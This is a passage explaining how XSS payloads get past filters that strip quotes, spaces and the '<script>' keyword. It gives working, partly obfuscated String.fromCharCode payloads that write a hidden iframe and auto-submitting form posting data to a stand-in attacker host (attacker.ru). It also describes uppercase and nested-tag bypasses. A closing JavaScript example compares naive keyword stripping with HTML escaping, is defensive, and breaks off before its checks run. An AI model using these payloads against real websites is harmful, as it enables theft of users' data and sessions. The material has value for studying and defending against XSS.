Sometimes an attacker encounters a situation in which a particular attack method cannot be implemented. The most common case is filtering of apostrophes and quotation marks in received and sent data.
If these characters enclose the values of tag attributes, styles, and so on, it is often possible to rewrite the same expression without them.
<script> alert(String.fromCharCode(72, 101, 108, 108, 111)); </script>
<div style=visibility:hidden;position:absolute;width:0;height:0;><iframe name=if1></iframe></div>
<form name=f1 method=POST target=if1 action=http://www.attacker.ru/attacker.php><input type=hidden name=data></form>
<script> test=String.fromCharCode(72,101,108,108,111); document.f1.data.value=test; document.f1.submit(); </script>
You can do without spaces and rewrite this code in one line. It will lose readability but retain its functionality:
<script>test=String.fromCharCode(72,101,108,108,111);document.open();document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,118,105,115,105,98,105,108,105,116,121,58,104,105,100,100,101,110,59,112,111,115,105,116,105,111,110,58,97,98,115,111,108,117,116,101,59,119,105,100,116,104,58,48,59,104,101,105,103,104,116,58,48,59,62,60,105,102,114,97,109,101,32,110,97,109,101,61,105,102,49,62,60,47,105,102,114,97,109,101,62,60,47,100,105,118,62));document.write(String.fromCharCode(60,102,111,114,109,32,110,97,109,101,61,102,49,32,109,101,116,104,111,100,61,80,79,83,84,32,116,97,114,103,101,116,61,105,102,49,32,97,99,116,105,111,110,61,104,116,116,112,58,47,47,119,119,119,46,97,116,97,99,107,101,114,46,114,117,47,97,116,97,99,107,101,114,46,112,104,112,62,60,105,110,112,117,116,32,116,121,112,101,61,104,105,100,100,101,110,32,110,97,109,101,61,100,97,116,97,32,118,97,108,117,101,61,39)+test+String.fromCharCode(39,62,60,47,102,111,114,109,62));document.close();document.f1.submit();</script>
This code sends data in a form to an iframe contained in a hidden layer. It is unreadable, but it works correctly and lets the attacker circumvent filtering of line feeds, quotation marks, and spaces.
This example shows that it is possible to write a script that exploits an XSS vulnerability and passes many checks.
In addition, the attacker is likely to probe for the most common filtering mistakes. For example, if a message is filtered by removing the <script> keyword, the attacker can try writing it in uppercase letters to confuse a case-sensitive filter. Or, if the <script> keyword is deleted only once, the attacker can use a construction such as <scri<script>pt>: after the inner <script> is deleted, the correct tag remains in the message.
In other words, there can be various approaches depending on which filtering algorithms are used.
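As an added example (not code from the original text), the two filter mistakes just described are reproduced in JavaScript against a naive remove-the-keyword filter, next to the output encoding that holds up regardless of case or nesting; the sample inputs are constructed.

```javascript
// Added example: why "delete the <script> keyword" filtering fails,
// and what a defender should do instead.

// Naive filter: removes the literal "<script>" once, case-sensitively.
// String.prototype.replace with a string pattern replaces only the
// first occurrence, which is exactly the "deleted once" mistake.
function naiveStrip(input) {
  return input.replace("<script>", "");
}

// Improved denylist: case-insensitive and repeated until stable, so the
// nested and uppercase tricks no longer work. Still a denylist, so it only
// knows about the one tag it was told about.
function repeatedStrip(input) {
  let prev;
  do {
    prev = input;
    input = input.replace(/<script>/gi, "");
  } while (input !== prev);
  return input;
}

// Robust approach: do not remove dangerous markup, encode every character
// that has meaning to the HTML parser so the browser treats the whole
// string as text. No "<" survives, so tag case, nesting, and
// String.fromCharCode payloads are all irrelevant.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Check used below: does an opening tag the browser would parse remain?
function containsTag(output) {
  return /<[a-z]/i.test(output);
}

// Constructed inputs, taken from the evasions described in the text.
const samples = {
  nested: "<scri<script>pt>alert(1)</script>",
  upper: "<SCRIPT>alert(1)</SCRIPT>",
};
```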